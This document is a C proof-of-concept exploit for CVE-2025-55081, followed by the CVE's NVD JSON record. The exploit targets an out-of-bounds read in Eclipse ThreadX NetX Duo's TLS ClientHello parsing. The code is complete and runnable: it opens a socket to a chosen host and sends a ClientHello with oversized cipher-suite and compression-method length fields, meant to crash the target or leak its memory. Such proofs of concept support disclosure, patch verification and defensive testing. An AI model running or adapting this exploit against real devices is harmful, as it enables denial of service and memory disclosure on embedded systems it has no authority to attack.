CVE-2025-55081

/* * CVE-2025-55081 PoC - Eclipse ThreadX NetX Duo TLS ClientHello OOB Read * * This PoC demonstrates the vulnerability by sending a crafted TLS ClientHello * message with malformed cipher_suites_length and compression_methods_length * fields to trigger an out-of-bounds read in _nx_secure_tls_process_clienthello(). * * Vulnerability: Missing length verification of ciphersuite length and * compression method length in TLS ClientHello message processing. * * Affected: Eclipse Foundation NetX Duo before 6.4.4 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> /* TLS Record Type */ #define TLS_CONTENT_TYPE_HANDSHAKE 0x16 /* TLS Handshake Type */ #define TLS_HANDSHAKE_CLIENT_HELLO 0x01 /* TLS Version */ #define TLS_VERSION_MAJOR 0x03 #define TLS_VERSION_MINOR 0x03 /* TLS 1.2 */ /* * Build a malicious TLS ClientHello with oversized cipher_suites_length * and compression_methods_length to trigger OOB read. */ unsigned char *build_malicious_client_hello(int *out_len) { unsigned char *buf = (unsigned char *)malloc(1024); int offset = 0; /* TLS Record Header */ buf[offset++] = TLS_CONTENT_TYPE_HANDSHAKE; buf[offset++] = TLS_VERSION_MAJOR; buf[offset++] = TLS_VERSION_MINOR; /* Record length placeholder (2 bytes) */ int record_len_pos = offset; buf[offset++] = 0x00; buf[offset++] = 0x00; /* Handshake Header */ buf[offset++] = TLS_HANDSHAKE_CLIENT_HELLO; /* Handshake length placeholder (3 bytes) */ int hs_len_pos = offset; buf[offset++] = 0x00; buf[offset++] = 0x00; buf[offset++] = 0x00; /* Client Version */ buf[offset++] = TLS_VERSION_MAJOR; buf[offset++] = TLS_VERSION_MINOR; /* Random (32 bytes) */ memset(&buf[offset], 0x41, 32); offset += 32; /* Session ID Length (0 - no session ID) */ buf[offset++] = 0x00; /* === MALICIOUS: Cipher Suites Length === */ /* Set to 0xFF00 (large value) to trigger OOB read */ buf[offset++] = 0xFF; buf[offset++] = 0x00; /* Only provide 2 bytes of actual cipher suite data */ buf[offset++] = 0x00; buf[offset++] = 0x2F; /* TLS_RSA_WITH_AES_128_CBC_SHA */ /* === MALICIOUS: Compression Methods Length === */ /* Set to 0xFF (large value) to trigger OOB read */ buf[offset++] = 0xFF; /* Only provide 1 byte of actual compression method data */ buf[offset++] = 0x00; /* null compression */ /* Fill record length */ int hs_len = offset - hs_len_pos - 3; buf[hs_len_pos] = (hs_len >> 16) & 0xFF; buf[hs_len_pos + 1] = (hs_len >> 8) & 0xFF; buf[hs_len_pos + 2] = hs_len & 0xFF; int rec_len = offset - record_len_pos - 2; buf[record_len_pos] = (rec_len >> 8) & 0xFF; buf[record_len_pos + 1] = rec_len & 0xFF; *out_len = offset; return buf; } int main(int argc, char *argv[]) { char *target_ip = "192.168.1.100"; int target_port = 443; if (argc >= 2) target_ip = argv[1]; if (argc >= 3) target_port = atoi(argv[2]); printf("[+] CVE-2025-55081 PoC - NetX Duo TLS ClientHello OOB Read\n"); printf("[+] Target: %s:%d\n", target_ip, target_port); /* Create socket */ int sock = socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) { perror("[-] Socket creation failed"); return 1; } struct sockaddr_in addr; addr.sin_family = AF_INET; addr.sin_port = htons(target_port); inet_pton(AF_INET, target_ip, &addr.sin_addr); /* Connect to target */ printf("[*] Connecting to target...\n"); if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("[-] Connection failed"); close(sock); return 1; } /* Build and send malicious ClientHello */ int payload_len; unsigned char *payload = build_malicious_client_hello(&payload_len); printf("[*] Sending malicious ClientHello (%d bytes)...\n", payload_len); printf("[*] Malicious cipher_suites_length: 0xFF00\n"); printf("[*] Malicious compression_methods_length: 0xFF\n"); send(sock, payload, payload_len, 0); printf("[+] Payload sent. Check target for crash or memory disclosure.\n"); free(payload); close(sock); return 0; }

{"cve": {"id": "CVE-2025-55081", "sourceIdentifier": "[email protected]", "published": "2025-10-15T11:15:39.063", "lastModified": "2025-10-27T19:03:20.530", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Eclipse Foundation NextX Duo before 6.4.4, a module of ThreadX, the _nx_secure_tls_process_clienthello() function was missing length verification of \ncertain SSL/TLS client hello message: the ciphersuite length and \ncompression method length. In case of an attacker-crafted message with \nvalues outside of the expected range, it could cause an out-of-bound \nread."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.4.4.202503", "matchCriteriaId": "24743F34-C00F-4CB2-BCEE-2BB29FA265CB"}]}]}], "references": [{"url": "https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-5vrv-8j5h-h6h6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}